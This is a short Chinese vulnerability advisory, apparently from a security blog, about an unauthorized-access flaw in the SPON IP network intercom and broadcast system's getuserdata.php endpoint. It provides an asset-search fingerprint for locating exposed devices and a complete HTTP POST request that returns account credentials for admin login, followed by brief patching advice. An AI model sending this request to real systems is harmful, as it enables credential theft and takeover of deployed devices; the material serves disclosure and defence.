世邦通信SPON IP网络对讲广播系统未授权访问

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统getuserdata.php存在未授权访问漏洞,攻击者可通过该漏洞在服务器端读取账户密码,从而登录后台。

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/getuserdata.php HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

jsondata[pageIndex]=0&jsondata[pageCount]=30

可以通过获取的账户密码登录后台

修复建议

1、升级至最新安全版本。

2、限制接口访问。

相关推荐
wanhengidc4 小时前
服务器机柜与网络机柜各自的优势
服务器·网络·智能路由器
网易独家音乐人Mike Zhou4 小时前
【Linux应用】开发板USB共享网络,网线或USB以太网共享网络(局域网连接PC和开发板,实现PC给开发板共享网络,USB通过NDIS驱动共享)
linux·网络·单片机·mcu·物联网·嵌入式·iot
托比-马奎尔5 小时前
第十二章:网络编程
网络
DoraBigHead5 小时前
比特的尽头,是世界的入口
网络协议
颖川初尘5 小时前
端口到底是个什么鬼?回答我!
服务器·网络·tcp/ip·node.js
浩浩测试一下6 小时前
Windows 与 Linux 内核安全及 Metasploit/LinEnum 在渗透测试中的综合应用
linux·运维·windows·web安全·网络安全·系统安全·安全架构
daikaimiao7 小时前
https——TCP+TLS
网络协议·tcp/ip·https
言之。7 小时前
借助ssh实现web服务的安全验证
运维·安全·ssh
nightunderblackcat8 小时前
新手向:Python网络编程,搭建简易HTTP服务器
网络·python·http
Yama1178 小时前
SSL与HTTP概述
网络协议·http·ssl